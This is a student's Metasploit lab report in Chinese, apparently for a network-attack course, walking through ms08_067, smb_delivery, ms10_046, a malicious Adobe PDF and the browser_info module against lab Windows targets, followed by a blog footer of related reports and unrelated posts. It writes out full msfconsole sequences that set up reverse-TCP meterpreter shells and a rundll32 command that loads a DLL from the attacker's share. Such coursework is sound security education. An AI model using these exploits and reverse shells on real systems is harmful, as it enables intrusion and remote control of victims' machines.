Exp5 MSF基础应用

---

1. 实践内容

1.1一个主动攻击实践，如ms08_067，smb_delivery（唯一）

1.2 一个针对浏览器的攻击，如ms10_046；

1.3 一个针对客户端的攻击，如Adobe；

1.4 成功应用任何一个辅助模块。gather/browser_info（唯一）

---

2.报告内容

一个主动攻击实践，如ms08_067，smb_delivery

（1）ms08_067

攻击机：Linux

靶机：Windows XP sp3

1.进入到/usr/share/metasploit-framework/modules/exploits/windows/smb路径下，查看可利用的漏洞

Linux的IP地址192.168.132.130

靶机IP地址192.168.132.131

2.

msf > use exploit/windows/smb/ms08_067_netapi//使用ms08_067漏洞

msf exploit(ms08_067_netapi) > show payloads//显示回连攻击载荷

msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp

msf exploit(ms08_067_netapi) > set LHOST 192.168.132.130 //攻击机ip

msf exploit(ms08_067_netapi) > set LPORT 4301 //攻击端口

msf exploit(ms08_067_netapi) > set RHOST 172.30.4.19 //靶机ip

msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型

msf exploit(ms08_067_netapi) > exploit //攻击

3.攻击成功，用systeminfo命令检测

（2）smb_delivery（唯一）

1.msf > use exploit/windows/smb/smb_delivery //使用smb_delivery漏洞

2.show options查看要设置的内容

3.通过Windows计算机中的rundll32.exe运行恶意代码以获取meterpreter会话

4.输入生成指令rundll32.exe \\192.168.132.130\Rrzqb\test.dll，0

5.攻击成功，获得meterpreter会话

一个针对浏览器的攻击，如ms10_046

1.使用ms10_046，查看需要设置的参数，SRVHOST填本地监听主机的IP地址，LHOST填监听的IP地址，攻击

生成一个URL：http://192.168.132.130:80/,在靶机的IE浏览器上使用该url进行访问,攻击成功

2.输入sessions查看连接

3.输入sessions -i 1，实现meterpreter会话

一个针对客户端的攻击，如Adobe

1.

在攻击机kali输入msfconsole进入控制台，依次输入
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.132.130
msf exploit(adobe_cooltype_sing) > set LPORT 4301 
msf exploit(adobe_cooltype_sing) > set FILENAME c.pdf 
msf exploit(adobe_cooltype_sing) > exploit //攻击
成功生成c.pdf，传输到靶机

2.

退出当前模块，进入监听模块，输入以下命令：

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
msf exploit(handler) > set LHOST 192.168.132.130 
msf exploit(handler) > set LPORT 4301 
msf exploit(handler) > exploit

在靶机上点击传送的c.pdf

发现攻击成功，实现meterpreter会话

成功应用任何一个辅助模块。gather/browser_info（唯一）

1.使用gather/browser_info模块

输入show options命令，发现该模块是通过访问网站来搜集浏览器信息

2.按show options内容设置好参数后，生成URL：http://192.168.132.130:8080/SuLgGmvDz

3.在靶机浏览器上输入该地址

4.成功查找到信息

---

3.1.基础问题回答

用自己的话解释什么是exploit,payload,encode.

exploit，漏洞利用；payload，攻击载荷，系统被攻击后执行的操作；encode，对后门程序进行编码处理，实现免杀。

3.2.实践总结与体会

这次实验很简单，但做了很长时间。因为对msf应用和指令的不熟悉，尝试了很多攻击都失败了，但也让我对msf基础攻击的

具体操作方法有了进一步的认识。

20164301 Exp5 MSF基础应用的更多相关文章

1. 2018-2019 20165232 Exp5 MSF基础应用

   2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...

2. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

   2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

3. 2018-2019 20165221 网络对抗 Exp5 MSF基础

   2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

4. 2018-2019-2 20165206 网络攻防技术 Exp5 MSF基础应用

   - 2018-2019-2 20165206<网络攻防技术>Exp5 MSF基础应用 - 实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如 ...

5. 2018-2019 20165235 网络对抗 Exp5 MSF基础

   2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

6. 2018-2019-2 网络对抗技术 20162329 Exp5 MSF基础应用

   目录 Exp5 MSF基础应用 一.基础问题回答 二.攻击系统 ms08_067攻击(成功) 三.攻击浏览器 ms11_050_mshtml_cobjectelement(Win7失败) 手机浏览器攻 ...

7. 2018-2019-2 20165311《网络对抗技术》Exp5 MSF基础应用

   <网络对抗技术>Exp5 MSF基础应用 实验目的 实验内容 一个主动攻击实践(ms08_067) 一个针对浏览器的攻击(ms11_050) 一个针对客户端的攻击(adobe_toolbu ...

8. 2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用

   2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具 ...

9. 2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用

   2018-2019-2 网络对抗技术 20165225 Exp5 MSF基础应用 验前准备 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻 ...

随机推荐

1. POJ3974 &lpar;manacher&rpar;

   var s,t:ansistring; n,op:longint; p:..] of longint; procedure pre; var i:longint; begin s:='$*'; to ...

2. Git错误non-fast-forward

   Git错误non-fast-forward后的冲突解决 [日期:2012-04-21] 来源:Linux社区  作者:chain2012 [字体:大 中 小]   当要push代码到git时,出现提示 ...

3. Linux 前台 和 后台进程 说明

   一. 有关进程的几种常用方法 1.1  & 符号 在命令后面加上一个 & 符号,表示该命令放在后台执行,如: [oracle@singledb ~]$ crontab -l 20 17 ...

4. python 定义函数

   在Python中,定义一个函数要使用def语句,依次写出函数名.括号.括号中的参数和冒号:,然后,在缩进块中编写函数体,函数的返回值用return语句返回. 我们以自定义一个求绝对值的my_abs函数 ...

5. 自定的TableView

   一.自定的TableView 有的时候,我们需要vc视图中添加一个表视图,此时在ViewController中使用TableViewController是不可行的这就,因此就要使用自定义的TableV ...

6. JavaScript压缩混淆 &sol; 格式化 &sol; 美化工具 - aTool在线工具

   原文地址:http://www.atool.org/jscompression.php

7. C&num;&nbsp&semi;字符串加密解密函数

   原文:C# 字符串加密解密函数 using System; using System.Text;using System.Security.Cryptography; using System.IO; ...

8. MySQL数据文件的导入、导出

   1.导出整个数据库 mysqldump -u 用户名 -p 数据库名 > 导出的文件名 mysqldump -u wcnc -p smgp_apps_wcnc > wcnc.sql 2.导 ...

9. linux 的tee命令

   tee 如果你在linux下希望将程序或命令运行的信息,在输入到文件的同时,也能够显示在屏幕上,你可以考虑使用tee这个命令.举个例子,直接上图 这里我调用函数aaa来完成将结果输入到aaa.log里 ...

10. 让linux远程主机在后台运行脚本

    后台挂起:python xxx.py & 在脚本命令后面加入"&"符号就可以后台运行.结束进程:kill -9 sidps -ef | grep ... 查询sid